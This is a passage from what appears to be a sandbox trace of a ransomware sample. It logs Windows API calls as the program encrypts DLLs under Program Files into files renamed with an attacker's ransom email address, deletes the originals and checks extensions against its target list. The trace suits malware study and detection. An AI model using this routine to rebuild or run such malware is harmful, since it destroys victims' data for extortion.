lpOverlapped=0x0) returned 1 [0184.271] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.271] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xea, lpOverlapped=0x0) returned 1 [0184.271] SetEndOfFile (hFile=0x390) returned 1 [0184.272] CloseHandle (hObject=0x390) returned 1 [0184.272] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.272] SetEndOfFile (hFile=0x38c) returned 1 [0184.276] CloseHandle (hObject=0x38c) returned 1 [0184.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.277] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll")) returned 1 [0184.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.277] lstrlenW (lpString=".doc") returned 4 [0184.277] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.277] lstrlenW (lpString=".docx") returned 5 [0184.277] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0184.277] lstrlenW (lpString=".pdf") returned 4 [0184.277] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.277] lstrlenW (lpString=".xls") returned 4 [0184.277] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.277] lstrlenW (lpString=".xlsx") returned 5 [0184.277] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0184.277] lstrlenW (lpString=".ppt") returned 4 [0184.277] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.277] lstrlenW (lpString=".zip") returned 4 [0184.277] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.277] lstrlenW (lpString=".rar") returned 4 [0184.277] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.278] lstrlenW (lpString=".bz2") returned 4 [0184.278] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.278] lstrlenW (lpString=".7z") returned 3 [0184.278] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.278] lstrlenW (lpString=".dbf") returned 4 [0184.278] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.278] lstrlenW (lpString=".1cd") returned 4 [0184.278] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.278] lstrlenW (lpString=".jpg") returned 4 [0184.278] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.278] lstrlenW (lpString=".doc") returned 4 [0184.278] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.278] lstrlenW (lpString=".docx") returned 5 [0184.278] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0184.278] lstrlenW (lpString=".pdf") returned 4 [0184.278] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.278] lstrlenW (lpString=".xls") returned 4 [0184.278] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.278] lstrlenW (lpString=".xlsx") returned 5 [0184.278] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0184.278] lstrlenW (lpString=".ppt") returned 4 [0184.278] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.279] lstrlenW (lpString=".zip") returned 4 [0184.279] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.279] lstrlenW (lpString=".rar") returned 4 [0184.279] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.279] lstrlenW (lpString=".bz2") returned 4 [0184.279] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.279] lstrlenW (lpString=".7z") returned 3 [0184.279] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.279] lstrlenW (lpString=".dbf") returned 4 [0184.279] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.279] lstrlenW (lpString=".1cd") returned 4 [0184.279] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 91 [0184.279] lstrlenW (lpString=".jpg") returned 4 [0184.279] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.280] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.280] lstrlenW (lpString="VSTOLoader.dll") returned 14 [0184.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0184.280] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=367216) returned 1 [0184.280] CloseHandle (hObject=0x38c) returned 1 [0184.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll")) returned 0x20 [0184.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0184.281] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.281] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0184.281] GetLastError () returned 0x0 [0184.282] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x59a70, lpOverlapped=0x0) returned 1 [0184.413] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x59a80, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x59a80, lpOverlapped=0x0) returned 1 [0184.420] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.420] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf0, lpOverlapped=0x0) returned 1 [0184.421] SetEndOfFile (hFile=0x390) returned 1 [0184.421] CloseHandle (hObject=0x390) returned 1 [0184.421] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.421] SetEndOfFile (hFile=0x38c) returned 1 [0184.428] CloseHandle (hObject=0x38c) returned 1 [0184.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.428] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll")) returned 1 [0184.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.428] lstrlenW (lpString=".doc") returned 4 [0184.428] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.428] lstrlenW (lpString=".docx") returned 5 [0184.428] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0184.428] lstrlenW (lpString=".pdf") returned 4 [0184.428] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.429] lstrlenW (lpString=".xls") returned 4 [0184.429] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.429] lstrlenW (lpString=".xlsx") returned 5 [0184.429] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0184.429] lstrlenW (lpString=".ppt") returned 4 [0184.429] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.429] lstrlenW (lpString=".zip") returned 4 [0184.429] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.429] lstrlenW (lpString=".rar") returned 4 [0184.429] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.429] lstrlenW (lpString=".bz2") returned 4 [0184.429] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.429] lstrlenW (lpString=".7z") returned 3 [0184.429] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.429] lstrlenW (lpString=".dbf") returned 4 [0184.429] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.429] lstrlenW (lpString=".1cd") returned 4 [0184.429] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.429] lstrlenW (lpString=".jpg") returned 4 [0184.429] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.429] lstrlenW (lpString=".doc") returned 4 [0184.429] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.430] lstrlenW (lpString=".docx") returned 5 [0184.430] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0184.430] lstrlenW (lpString=".pdf") returned 4 [0184.430] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.430] lstrlenW (lpString=".xls") returned 4 [0184.430] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.430] lstrlenW (lpString=".xlsx") returned 5 [0184.430] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0184.430] lstrlenW (lpString=".ppt") returned 4 [0184.430] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.430] lstrlenW (lpString=".zip") returned 4 [0184.430] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.430] lstrlenW (lpString=".rar") returned 4 [0184.430] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.430] lstrlenW (lpString=".bz2") returned 4 [0184.430] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.430] lstrlenW (lpString=".7z") returned 3 [0184.430] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.430] lstrlenW (lpString=".dbf") returned 4 [0184.430] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.430] lstrlenW (lpString=".1cd") returned 4 [0184.430] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 71 [0184.430] lstrlenW (lpString=".jpg") returned 4 [0184.430] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.431] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.431] lstrlenW (lpString="VSTOMessageProvider.dll") returned 23 [0184.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0184.431] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=48872) returned 1 [0184.431] CloseHandle (hObject=0x38c) returned 1 [0184.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll")) returned 0x20 [0184.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0184.432] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.432] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0184.432] GetLastError () returned 0x0 [0184.432] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0xbee8, lpOverlapped=0x0) returned 1 [0187.934] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xbef0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xbef0, lpOverlapped=0x0) returned 1 [0187.937] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0187.937] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x102, lpOverlapped=0x0) returned 1 [0187.937] SetEndOfFile (hFile=0x390) returned 1 [0187.937] CloseHandle (hObject=0x390) returned 1 [0187.937] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0187.937] SetEndOfFile (hFile=0x38c) returned 1 [0187.938] CloseHandle (hObject=0x38c) returned 1 [0187.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0187.939] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll")) returned 1 [0187.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.939] lstrlenW (lpString=".doc") returned 4 [0187.939] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0187.939] lstrlenW (lpString=".docx") returned 5 [0187.939] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0187.939] lstrlenW (lpString=".pdf") returned 4 [0187.939] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0187.939] lstrlenW (lpString=".xls") returned 4 [0187.939] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0187.939] lstrlenW (lpString=".xlsx") returned 5 [0187.939] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0187.939] lstrlenW (lpString=".ppt") returned 4 [0187.940] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0187.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.940] lstrlenW (lpString=".zip") returned 4 [0187.940] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0187.940] lstrlenW (lpString=".rar") returned 4 [0187.940] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0187.940] lstrlenW (lpString=".bz2") returned 4 [0187.940] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0187.940] lstrlenW (lpString=".7z") returned 3 [0187.940] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0187.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.940] lstrlenW (lpString=".dbf") returned 4 [0187.940] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0187.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.940] lstrlenW (lpString=".1cd") returned 4 [0187.940] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0187.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.940] lstrlenW (lpString=".jpg") returned 4 [0187.940] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0187.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.940] lstrlenW (lpString=".doc") returned 4 [0187.940] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0187.940] lstrlenW (lpString=".docx") returned 5 [0187.940] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0187.940] lstrlenW (lpString=".pdf") returned 4 [0187.940] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0187.940] lstrlenW (lpString=".xls") returned 4 [0187.941] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0187.941] lstrlenW (lpString=".xlsx") returned 5 [0187.941] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0187.941] lstrlenW (lpString=".ppt") returned 4 [0187.941] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0187.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.941] lstrlenW (lpString=".zip") returned 4 [0187.941] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0187.941] lstrlenW (lpString=".rar") returned 4 [0187.941] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0187.941] lstrlenW (lpString=".bz2") returned 4 [0187.941] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0187.941] lstrlenW (lpString=".7z") returned 3 [0187.941] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0187.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.941] lstrlenW (lpString=".dbf") returned 4 [0187.941] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0187.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.941] lstrlenW (lpString=".1cd") returned 4 [0187.941] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0187.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 80 [0187.941] lstrlenW (lpString=".jpg") returned 4 [0187.941] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0187.941] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0187.941] lstrlenW (lpString="decora_sse.dll") returned 14 [0187.942] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0187.942] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=86080) returned 1 [0187.942] CloseHandle (hObject=0x38c) returned 1 [0187.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll")) returned 0x20 [0187.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0187.943] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0187.943] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0187.943] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0187.943] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0187.943] GetLastError () returned 0x0 [0187.943] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x15040, lpOverlapped=0x0) returned 1 [0188.760] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x15050, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x15050, lpOverlapped=0x0) returned 1 [0188.762] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.762] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf0, lpOverlapped=0x0) returned 1 [0188.762] SetEndOfFile (hFile=0x390) returned 1 